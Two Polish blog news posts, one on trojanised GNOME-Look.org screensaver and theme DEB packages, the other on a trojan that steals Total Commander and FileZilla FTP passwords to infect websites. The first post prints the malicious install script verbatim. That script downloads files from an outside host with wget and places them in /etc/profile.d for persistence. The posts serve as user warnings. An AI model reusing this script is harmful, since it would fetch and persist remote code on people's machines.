Bogdan.at

Jak donoszą użytkownicy z całego świata, razem z niektórymi wygaszaczami i motywami dla Linuksa na GNOME-Look.org można znaleźć niezbyt przyjemny dodatek…

Chodzi o skrypt, który wykonuje się w systemie podczas instalacji z paczki DEB i wygląda następująco:

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit

Bardziej zaawansowani użytkownicy już z pewnością wypatrzyli, że całość modyfikuje plik profile.d co pozwala na przyłączenie naszego systemu do bootnetu i na przykład udział w atakach DDoS czy wykonywaniu innych zleconych mu czynności.

Czy to więc koniec tezy o bezpieczeństwie Linuksa?

Na szczęście nie. Podczas instalacji paczki Deb jesteśmy zmuszeni podać hasło po uzyskaniu którego menedżer pakietów może zrobić z systemem dosłownie wszystko. Bez zezwolenia użytkownika (podania hasła) taka sytuacja nie może mieć miejsca, nie jest to zatem bynajmniej luka w bezpieczeństwie systemu Ubuntu czy ogólnie Linuksów.

Co innego jednak, że ciągłe wpisywanie hasła z czasem zwyczajnie wchodzi nam w krew i przy setnej czy tysięcznej prośbie o jego podanie naturalnym jest, że nie zastanawiamy się nad konsekwencjami.

Jeśli instalowałeś ostatnio pakiety Waterfall ScreenSaver bądź Ninja Black z GNOME-Look.org (które uznawane były za zarażone) odtrutką na skrypt jest wykonanie polecenia: Czytaj dalej…

Najpierw kradnie hasła z menedżera plików Total Commander (TC), potem łączy się z serwerami FTP i dodaje złośliwe skrypty do plików stron internetowych. Jak bronić się przed niezidentyfikowanym wirusem radzi przedstawiciel polskiej ekipy TC.

Po sieci grasuje wirus, który łączy się z serwerami FTP i infekuje strony internetowe. Informacje taką przekazał nam jeden z czytelników Dziennika Internautów kierując na blog shpyo.net. Szkodnik kradnie hasła z programu Total Commander po czym dodaje ukryte ramki, linki i złośliwy kod do plików index.php, index.html, main.php i wielu innych, które ma w definicjach.

Zagrożone są strony oparte na autorskich oraz popularnych skryptach, np. WordPress. Użytkownicy tego ostatniego narzędzia mogą znaleźć złośliwy kod w szablonach w katalogu wp-content/themes/ oraz w innych plikach z ustawieniami konfiguracyjnym – ostrzega autor shpyo.net.

Po zainfekowaniu strony dostęp do niej zostaje zablokowany przez osłony sieciowe programów antywirusowych, a także przez wyszukiwarkę Google, która ostrzega o niebezpiecznej stronie.

Aby wyjaśnić sytuację i rozwiać ewentualne wątpliwości Dziennik Internautów skontaktował się z polskim przedstawicielem Total Commandera. Potwierdził on pojawienie się wyjątkowo aktywnego szkodnika, który faktycznie loguje się się na konta FTP i dodaje pewien fragment kodu do plików startowych.

Co do samego wirusa to wiem tylko, że jest to oprogramowanie malware/trojan. Dodatkowo wykrada ono hasła z programu Filezilla. Jedynym bezpiecznym rozwiązaniem problemu jest usunięcie wirusa poprzez program antywirusowy a następnie zmiana haseł do swoich kont FTP. Problem zostanie rozwiązany w wersji 7.50, gdzie hasła do FTP będą zaszyfrowane algorytmem AES. Do czasu wydania finalnej nowej wersji zalecam niezapisywanie haseł w programie – radzi Adam Bukowiński, przedstawiciel programu Total Commander.

Źródło: Dziennik Internautów, shpyo.net